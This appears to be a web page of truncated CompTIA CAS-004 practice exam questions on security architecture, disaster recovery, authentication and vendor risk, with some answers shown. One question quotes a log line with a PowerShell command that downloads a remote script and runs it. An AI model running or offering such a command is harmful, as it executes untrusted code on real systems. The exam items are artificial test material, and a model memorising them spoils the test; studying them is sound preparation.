CAS-004 exam

A security architect works for a manufacturing organization that has many different branch offices. The architect is looking for a way to reduce traffic and ensure the branch offices receive the latest copy of revoked certificates issued by the CA at the organization’s headquarters location. The solution must also have...

During a remodel, a company’s computer equipment was moved to a secure storage room with cameras positioned on both sides of the door. The door is locked using a card reader issued by the security team, and only the security team and department managers have access to the room. The...

A disaster recovery team learned of several mistakes that were made during the last disaster recovery parallel test. Computational resources ran out at 70% of restoration of critical services. Which of the following should be modified to prevent the issue from reoccurring?A . Recovery point objectiveB . Recovery time objectiveC...

Which of the following represents the MOST significant benefit of implementing a passwordless authentication solution?A . Biometric authenticators are immutable.B . The likelihood of account compromise is reduced.C . Zero trust is achieved.D . Privacy risks are minimized.View AnswerAnswer: B Explanation: Reference: https://cloudworks.no/en/5-benefits-of-passwordless-authentication/

Which of the following are risks associated with vendor lock-in? (Choose two.)A . The client can seamlessly move data.B . The vendor can change product offerings.C . The client receives a sufficient level of service.D . The client experiences decreased quality of service.E . The client can leverage a multicloud...

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois Which of the following security controls would have...

A company recently acquired a SaaS provider and needs to integrate its platform into the company's existing infrastructure without impact to the customer's experience. The SaaS provider does not have a mature security program A recent vulnerability scan of the SaaS provider's systems shows multiple critical vulnerabilities attributed to very...

An attacker infiltrated the code base of a hardware manufacturer and inserted malware before the code was compiled. The malicious code is now running at the hardware level across a number of industries and sectors . Which of the following categories BEST describes this type of vendor risk?A . SDLC...

An IT administrator is reviewing all the servers in an organization and notices that a server is missing crucial practice against a recent exploit that could gain root access. Which of the following describes the administrator’s discovery?A . A vulnerabilityB . A threatC . A breachD . A riskView AnswerAnswer:...

The OS on several servers crashed around the same time for an unknown reason. The servers were restored to working condition, and all file integrity was verified . Which of the following should the incident response team perform to understand the crash and prevent it in the future?A . Root...